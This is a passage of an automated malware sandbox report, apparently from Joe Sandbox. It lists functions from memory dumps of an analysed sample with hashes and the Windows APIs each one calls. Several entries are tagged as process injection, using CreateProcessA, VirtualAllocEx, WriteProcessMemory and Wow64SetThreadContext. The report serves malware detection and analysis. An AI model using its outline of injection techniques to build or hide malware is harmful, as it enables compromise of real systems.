Instruction Fuzzy Hash: EA4175B9D042599FCF10CFA9D980ADEFBB1BB19310F20A02AE919B7310D375A945CF64

Function 01201C80 Relevance: 1.4, Strings: 1, Instructions: 163COMMON

Download Yara Rule

Strings

_)9, xrefs: 01201E50

Memory Dump Source

Source File: 00000000.00000002.1732336685.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_file.jbxd

Similarity

API ID:
String ID: _)9
API String ID: 0-1476165400
Opcode ID: 0bac4089b64c4be105fe16937028774fd3c0189fbfaf409108ccc201b926c42e
Instruction ID: 5f9e3ce7f8763551cc994f4c05019833e0d13145cb7ee448d5cb41d9d2837134
Opcode Fuzzy Hash: 0bac4089b64c4be105fe16937028774fd3c0189fbfaf409108ccc201b926c42e
Instruction Fuzzy Hash: 6E618CB0E142198FCB08CFA9C5416AEFBF2FF89300F14D56AD409B7295D3749941CB64

Function 0AA0BAA8 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740983289.000000000AA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ce69eabdee6d03035c101b143c430122f3a0636083017c608f56f4a39196bf3
Instruction ID: f22d9b99e95003db1263706c03610463c93240a13bece30965012ed3aa4312a1
Opcode Fuzzy Hash: 9ce69eabdee6d03035c101b143c430122f3a0636083017c608f56f4a39196bf3
Instruction Fuzzy Hash: 29C1AA70B017009FDB29EB75D560BAAB7F6AF89700F5584ADD1468B2E1CF34E901CBA1

Function 01203535 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732336685.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c83349cc88625b7076a9ea3abc7ce3385adf95b8d9b5c3c7d417bc0390fedc0e
Instruction ID: f211a16aea3ed03381fe5a392b9a35cae785abc4803fef115e97f3c3710a2fa0
Opcode Fuzzy Hash: c83349cc88625b7076a9ea3abc7ce3385adf95b8d9b5c3c7d417bc0390fedc0e
Instruction Fuzzy Hash: 35E17D74D2524ADFCB05CFA9C88149EFBB2FF8A300B18D599D511AB356D334A942CF94

Function 012035C0 Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732336685.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3cea78825112ffea60cd09f1668bfb6354567d98fd98ae7236b7c0f9b322c8a
Instruction ID: 0309662fe6bdcccf88861e904c12366edb7542c117af25d230670252fdd3d976
Opcode Fuzzy Hash: b3cea78825112ffea60cd09f1668bfb6354567d98fd98ae7236b7c0f9b322c8a
Instruction Fuzzy Hash: 5DD14774E2520ADFCB04CFA9C9818AEFBB2FF89300B14D655D515AB355D334AA82CF94

Function 0A0E1860 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1739529980.000000000A0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf36277876827734d4552e70d367988315e985bcb081d7662feb99a7dc151584
Instruction ID: 862b7cbea3966f80538b2c1bcfea295c3b64e8724196015d48a1ec05bbffa2ed
Opcode Fuzzy Hash: bf36277876827734d4552e70d367988315e985bcb081d7662feb99a7dc151584
Instruction Fuzzy Hash: 0EC17B70E002589FCB64CFA5C98079EBBF2FF88300F15C6AAD419AB256DB309995DF51

Function 02B1D1A7 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732910300.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c653affa205260d0a6677e8f0862a447d65f7671a094f310a5e1fc779c11a60
Instruction ID: 7f43dd0ad79da0e7323de00de95317d538cdc4d3dbac6979f26322870e63c604
Opcode Fuzzy Hash: 8c653affa205260d0a6677e8f0862a447d65f7671a094f310a5e1fc779c11a60
Instruction Fuzzy Hash: 0CA1C575E0030A8FCB04DFA4D894ADDBBB6FF89300F958655E415AB2A4DB34A985CF50

Function 02B119DC Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732910300.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a78ea2edc6a3ff9ca21aa3299920c202adf627321806d1ee2dbcc9cf4eb9a62
Instruction ID: 86c727fda8ab4c0a3526736412d400c69fe1f7b7338bdd38d75dd0e3fecfd060
Opcode Fuzzy Hash: 6a78ea2edc6a3ff9ca21aa3299920c202adf627321806d1ee2dbcc9cf4eb9a62
Instruction Fuzzy Hash: AA91C4B4E10219DFCB04DFA9D984A9EBBF2FF88300F10956AD919AB365DB346941CF50

Function 02B11F3B Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732910300.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78357012166ceb4615dbc3ccd0679c25ed3170c7745b7a6a6e6daef2203b4a17
Instruction ID: d874a1e11d7426630e6d1bbd4062d7bae0bf66dfab27fea7c4be0580cdb1d1a0
Opcode Fuzzy Hash: 78357012166ceb4615dbc3ccd0679c25ed3170c7745b7a6a6e6daef2203b4a17
Instruction Fuzzy Hash: 4991C4B4E10219DFCB44DFA9D984A9EBBF2FF88300F10956AD819AB365DB346941CF50

Function 0AA00FA9 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740983289.000000000AA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd28d9b979e9ccf35cb33e7acd0f3567e84342ebf036356a2218c43d36b9972c
Instruction ID: 79b3c0555aea7c728814bddeebdc1616a5e3d42ebe4cd4e38a27dcdb4ecd93b0
Opcode Fuzzy Hash: fd28d9b979e9ccf35cb33e7acd0f3567e84342ebf036356a2218c43d36b9972c
Instruction Fuzzy Hash: 9351E574D04258CFDB24CF9AE884BDEBBB6BF89300F14C1AAE409AB294D7745985CF50

Function 012026E0 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732336685.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd64e5390a5e7235906606145011be28da05425eb6454420328ea168884142a9
Instruction ID: 165b792984ef8bdee74c89028847bfa25fd3ce816071ddfaf3852f643c1f3c8f
Opcode Fuzzy Hash: fd64e5390a5e7235906606145011be28da05425eb6454420328ea168884142a9
Instruction Fuzzy Hash: 653178B1E006188BDB19CFAADC446DEBFB3AFC9310F18C16AD409A6269DB740A45CF50

Function 0AA0A65E Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740983289.000000000AA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fede00c294c26a9436a0f572d13175dd786c63b4418bedd01f6c5a796f9b35f3
Instruction ID: 8704a05cc64bb85807e23c2d9b147c1791f68779ccacbf6d0dd1955133c96f4c
Opcode Fuzzy Hash: fede00c294c26a9436a0f572d13175dd786c63b4418bedd01f6c5a796f9b35f3
Instruction Fuzzy Hash: 51D09B35C4D744EFC7619EA079407F57A78A70B3C1F457456988D921D1D17588418F54

Function 02B18448 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02B184D6
GetCurrentThread.KERNEL32 ref: 02B18513
GetCurrentProcess.KERNEL32 ref: 02B18550
GetCurrentThreadId.KERNEL32 ref: 02B185A9

Memory Dump Source

Source File: 00000000.00000002.1732910300.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b10000_file.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 835f9b4b92a903fadb031a0ab9e2f944ec3115efffd5a7be1fe44caa2cfb65be
Instruction ID: 58a8a691e28be1e289261f34c5930f30522b244d426129e20f82bce1ffeb02fe
Opcode Fuzzy Hash: 835f9b4b92a903fadb031a0ab9e2f944ec3115efffd5a7be1fe44caa2cfb65be
Instruction Fuzzy Hash: 025146B0900209CFDB14CFA9D949B9EBBF1FF48314F248499E419A7251DB785984CF65

Function 02B18458 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02B184D6
GetCurrentThread.KERNEL32 ref: 02B18513
GetCurrentProcess.KERNEL32 ref: 02B18550
GetCurrentThreadId.KERNEL32 ref: 02B185A9

Memory Dump Source

Source File: 00000000.00000002.1732910300.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b10000_file.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d101892a2019da2c4dd8bc9db72cbdee00ae1291cef4f34e593956ccdd0b6525
Instruction ID: 38c1b95145db97395e7e23730277f6fab67c5954a1eaae158193c335332f5243
Opcode Fuzzy Hash: d101892a2019da2c4dd8bc9db72cbdee00ae1291cef4f34e593956ccdd0b6525
Instruction Fuzzy Hash: 695155B0900209CFDB14CFAAD949B9EBBF2FF48314F248499E419A7351DB789944CF65

Function 01208123 Relevance: 1.9, APIs: 1, Instructions: 414COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732336685.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3fc3f3350b2faccb4aefc1d8d1f077db2c48567403a05790eb5fbc1c30d2178
Instruction ID: 3d7d078b4fcd8077693f70118f9fbca00fec1c7070e1843cd7a4a00a994ca66b
Opcode Fuzzy Hash: d3fc3f3350b2faccb4aefc1d8d1f077db2c48567403a05790eb5fbc1c30d2178
Instruction Fuzzy Hash: 75F180B2C2A3D58FCB578F74C451199BFB0BF67328B2842DEC5809A1A3E3765806CB45

Function 0AA06E6C Relevance: 1.8, APIs: 1, Instructions: 325processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0AA0713F

Memory Dump Source

Source File: 00000000.00000002.1740983289.000000000AA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa00000_file.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 5e87d48af0e60947e00aa10ec9bbea03f8ed92e5577f02cb9be6e6aa26509d33
Instruction ID: 5b4e61e67eb6f1d50420a5863210546eab22bb2902d621a6cb59745baf724aa0
Opcode Fuzzy Hash: 5e87d48af0e60947e00aa10ec9bbea03f8ed92e5577f02cb9be6e6aa26509d33
Instruction Fuzzy Hash: D7C115B0D002598FDF20CFA8D951BEDBBB1BF49304F0095A9E859B7290DB749A85CF94

Function 0AA06E78 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0AA0713F

Memory Dump Source

Source File: 00000000.00000002.1740983289.000000000AA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa00000_file.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f4c1c017fb888977edc89d2640de27f49f0bc4ce2c066ee22ecb26a5716e64db
Instruction ID: e66bb1690b786abb054f57ea47dad312857c9cc13618ee5e60f21bfa4229ebcc
Opcode Fuzzy Hash: f4c1c017fb888977edc89d2640de27f49f0bc4ce2c066ee22ecb26a5716e64db
Instruction Fuzzy Hash: DCC105B0D002199FDF20CFA8D951BEDBBB1BF49304F0095A9E819B7290DB749A85CF95

Function 02B16088 Relevance: 1.7, APIs: 1, Instructions: 227COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 02B1630A

Memory Dump Source

Source File: 00000000.00000002.1732910300.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b10000_file.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 142891327bc874e3909c1ae0dc5cf5f1b6d5a4091a5b8fa7f18233bed6889e85
Instruction ID: 9ab645f8d5761131dde1a1702b1f5171148f829a64ea790b4c657a97da7d4574
Opcode Fuzzy Hash: 142891327bc874e3909c1ae0dc5cf5f1b6d5a4091a5b8fa7f18233bed6889e85
Instruction Fuzzy Hash: 2D9134B0A007089FDB24DF69D480B9ABBF5FF88304F10896AE44AE7750D734A849CF90

Function 02B1CD44 Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 02B1CF11

Memory Dump Source

Source File: 00000000.00000002.1732910300.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b10000_file.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f5629475e1f64ed2478f92cea7c371e9bb810a0403f18812b6ca96ef0045105b
Instruction ID: 77c40897cf4ce64df4c5c2acc9350c61535a4974be6f5009488115d0e9e6daba
Opcode Fuzzy Hash: f5629475e1f64ed2478f92cea7c371e9bb810a0403f18812b6ca96ef0045105b
Instruction Fuzzy Hash: 34716AB4D00258DFDF20CFA9D984BDEBBB1BB09304F5491AAE818A7211D7719A85CF45

Function 02B1CD50 Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 02B1CF11

Memory Dump Source

Source File: 00000000.00000002.1732910300.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b10000_file.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5eedc3b61e9201b3a77e212e0056dd9c8a38c2a8ce3bd54cc167725f95de5665
Instruction ID: 8092a33783cb460a04bb1f797bdc9e4f69e0d2eeb1059e3d3e03a4f9d77a3eb2
Opcode Fuzzy Hash: 5eedc3b61e9201b3a77e212e0056dd9c8a38c2a8ce3bd54cc167725f95de5665
Instruction Fuzzy Hash: D5717AB4D00218DFDF20CFA9C984B9DBBB1BB09304F6491AAE818B7211D731AA85CF45

Function 0A0E2280 Relevance: 1.6, APIs: 1, Instructions: 148windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0A0E2393

Memory Dump Source

Source File: 00000000.00000002.1739529980.000000000A0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0e0000_file.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: caf874b2ddb5925dc7129e4d0aa4fe02d82703a8fdcfbadbabf2dd0ac3de5457
Instruction ID: cb7e419d9bf736798b513ae3ae1bdf8418f82da35235cadcfe948dfab84a65fb
Opcode Fuzzy Hash: caf874b2ddb5925dc7129e4d0aa4fe02d82703a8fdcfbadbabf2dd0ac3de5457
Instruction Fuzzy Hash: C451DCB5D05258AFCF01CFA9D880ADEBFB5AB0A310F14906AE814BB211C335A941DF65

Function 02B10604 Relevance: 1.6, APIs: 1, Instructions: 128COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02B10701

Memory Dump Source

Source File: 00000000.00000002.1732910300.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b10000_file.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 0a5313abd972bac2bc4b84b997bf29d4dd74f4e2adbbf5551dc6e72b349611e1
Instruction ID: 98d253ca3baa4a377c13716609cd79c667d0fd66431bd2f10e8caf380882b591
Opcode Fuzzy Hash: 0a5313abd972bac2bc4b84b997bf29d4dd74f4e2adbbf5551dc6e72b349611e1
Instruction Fuzzy Hash: 5451D5B1D00218DFDB21DFA9C980B9EBBB5FF49300F1084AAD509BB251DB716A85CF91

Function 02B10610 Relevance: 1.6, APIs: 1, Instructions: 123COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02B10701

Memory Dump Source

Source File: 00000000.00000002.1732910300.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b10000_file.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e54921115027e86e208ef965b17ba38d308989173bb8cfc80b61b375a91fbffa
Instruction ID: 11015795108dfbe5773dbebcc2e1ae389ad4de4142f3f4698387b01820ac3478
Opcode Fuzzy Hash: e54921115027e86e208ef965b17ba38d308989173bb8cfc80b61b375a91fbffa
Instruction Fuzzy Hash: B851C4B1D00218DFDB20DFA9C940B9EBBB5AF49300F1084AAD509BB251DB756A89CF91

Function 0AA06AEA Relevance: 1.6, APIs: 1, Instructions: 117injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0AA06BC3

Memory Dump Source

Source File: 00000000.00000002.1740983289.000000000AA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa00000_file.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7b71e1d10c9293222dd146a57e06f5aec698945a80d7aa1781a14451096e2100
Instruction ID: e3165809772fc457e846f2d25cd45791d0bcb48c92cc3d318c0e00546dc88e48
Opcode Fuzzy Hash: 7b71e1d10c9293222dd146a57e06f5aec698945a80d7aa1781a14451096e2100
Instruction Fuzzy Hash: 1841CAB4D012589FCF10CFA9D980AEEFBF1BB49314F24902AE418BB240C775AA45CF54

Function 0AA06AF0 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0AA06BC3

Memory Dump Source

Source File: 00000000.00000002.1740983289.000000000AA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa00000_file.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 74174773979503e8ba95593d241105622552c01c2cccc8b48f8598ea0f2121cd
Instruction ID: b9f64483168e16153cf54feccf3b5e6d961739c648c62a90102e75b9b2dcb270
Opcode Fuzzy Hash: 74174773979503e8ba95593d241105622552c01c2cccc8b48f8598ea0f2121cd
Instruction Fuzzy Hash: 3041AAB5D012589FCF10CFA9D980ADEFBF1BB49314F24902AE418BB240D775AA45CF54

Function 02B18698 Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B1876B

Memory Dump Source

Source File: 00000000.00000002.1732910300.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b10000_file.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: df9bb1c915f513236815973f184451d7cf92dc6791884e16943c41526df94160
Instruction ID: 9877bd30baa2974a7d4f97c7ba8844fd76b04d134d64c33e88a6674b78f32e69
Opcode Fuzzy Hash: df9bb1c915f513236815973f184451d7cf92dc6791884e16943c41526df94160
Instruction Fuzzy Hash: 7B4154B9D002589FDF00CFA9D984ADEBBF5BF19310F24906AE918AB310D375A985CF54

Function 0AA06C40 Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0AA06CFA

Memory Dump Source

Source File: 00000000.00000002.1740983289.000000000AA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa00000_file.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: bf315ba8008e3ecc06df3b00b40c9138dc09732d7f0e782157598e6ea2eecc58
Instruction ID: 0a1ad401dc909b0a14d7b0c582a6f7e660abe22d8117099dd14601b0b90425c6
Opcode Fuzzy Hash: bf315ba8008e3ecc06df3b00b40c9138dc09732d7f0e782157598e6ea2eecc58
Instruction Fuzzy Hash: 3E41BAB4D04258DFCF10CFA9D885AEEFBB1BB59310F14902AE814B7250C775A945DF54

Function 02B186A0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B1876B

Memory Dump Source

Source File: 00000000.00000002.1732910300.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b10000_file.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 405256329eff5d7c6ba7f978e1c4ed2bbcde8b5155c2b373273790a190c26fc8
Instruction ID: a4d5ebb7c94aba1be8490a351662fa9167b74e7cf7976b0b39f5507e8bef058c
Opcode Fuzzy Hash: 405256329eff5d7c6ba7f978e1c4ed2bbcde8b5155c2b373273790a190c26fc8
Instruction Fuzzy Hash: 934153B9D002589FDB00CFA9D984ADEBBF5BB09310F24906AE918AB310D335A945CF94

Function 0AA06590 Relevance: 1.6, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0AA06642

Memory Dump Source

Source File: 00000000.00000002.1740983289.000000000AA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa00000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6813e3e7f5308e634a508b53fa5fedef219c3585f4b6780fdd480945420e2974
Instruction ID: 59baf02009749164389361f61d90f2730902c6faa77855961728064aa31386ab
Opcode Fuzzy Hash: 6813e3e7f5308e634a508b53fa5fedef219c3585f4b6780fdd480945420e2974
Instruction Fuzzy Hash: D241B9B4D042589FCF10CFA9D981ADEFBB1AB59310F10A42AE814BB250D775A905CF54

Function 0AA06C48 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0AA06CFA

Memory Dump Source

Source File: 00000000.00000002.1740983289.000000000AA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa00000_file.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 908201a45859b41b0e777d88f3ff2c1b6a515e29c33b6eb3a0ebb3cf6a50d236
Instruction ID: bf952ff666d92d50103957a2e942b8298a9126bfffb5401efa5370e9fe289152
Opcode Fuzzy Hash: 908201a45859b41b0e777d88f3ff2c1b6a515e29c33b6eb3a0ebb3cf6a50d236
Instruction Fuzzy Hash: D941ABB5D00258DFCF10CFA9D980ADEFBB5BB59310F14902AE814B7250D775A945CF64

Function 0AA06031 Relevance: 1.6, APIs: 1, Instructions: 105threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0AA060E7

Memory Dump Source

Source File: 00000000.00000002.1740983289.000000000AA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa00000_file.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 388618187eb67dee3bee82f06746dff5f9868ee3d7fd3f0e6481e1ca0ef60d19
Instruction ID: 2ae8b741764c012606aa36fac8eaf441fd2b05ed6dae390d76daac49c1d72b46
Opcode Fuzzy Hash: 388618187eb67dee3bee82f06746dff5f9868ee3d7fd3f0e6481e1ca0ef60d19
Instruction Fuzzy Hash: D641DBB5D042589FCF10CFA9E885AEEBFF1AF49324F24806AE414B7281C7796946CF54

Function 0AA06598 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0AA06642

Memory Dump Source

Source File: 00000000.00000002.1740983289.000000000AA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa00000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: acb2a62096bda3ac789e09d0e378ac2595659287fa4d50fb5b66b6cbb452dc11
Instruction ID: 27d9ee1f8c44de2888534a9d7f265dab58058522315407596aca5365f2a2bd27
Opcode Fuzzy Hash: acb2a62096bda3ac789e09d0e378ac2595659287fa4d50fb5b66b6cbb452dc11
Instruction Fuzzy Hash: 743197B8D002589FCF10CFA9D981ADEFBB5BB59320F10A42AE814B7240D775A901CF68

Function 02B1C274 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 02B1F581

Memory Dump Source

Source File: 00000000.00000002.1732910300.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b10000_file.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: c5ef66c94dfe8507a7a2f8e75b65f7de431a89b25742c1d169cd1c69bba27865
Instruction ID: f360b2c3e34fe6f7aa7b1d19511db102843025be3fecd180d0b12a52946a7cf4
Opcode Fuzzy Hash: c5ef66c94dfe8507a7a2f8e75b65f7de431a89b25742c1d169cd1c69bba27865
Instruction Fuzzy Hash: 24413AB5900305DFCB14CF99C889AAABBF5FF88314F24C499D519AB721D735A841CFA0

Function 01208398 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0120843F

Memory Dump Source

Source File: 00000000.00000002.1732336685.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: fc208b0f3cdb26a5e85faa94774d861e9a0ab9707731f0cf44e0dc67886f4d1d
Instruction ID: 967fc6d00e598c515fe8ec654f03239304fe7be7a61dee1b75e73ee55f121d8e
Opcode Fuzzy Hash: fc208b0f3cdb26a5e85faa94774d861e9a0ab9707731f0cf44e0dc67886f4d1d
Instruction Fuzzy Hash: 2D31A5B9D002589FCB10CFA9D980ADEFBF0AB19310F24A02AE818B7210D375A944CF64

Function 0AA06038 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0AA060E7

Memory Dump Source

Source File: 00000000.00000002.1740983289.000000000AA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA00000, based on PE: false

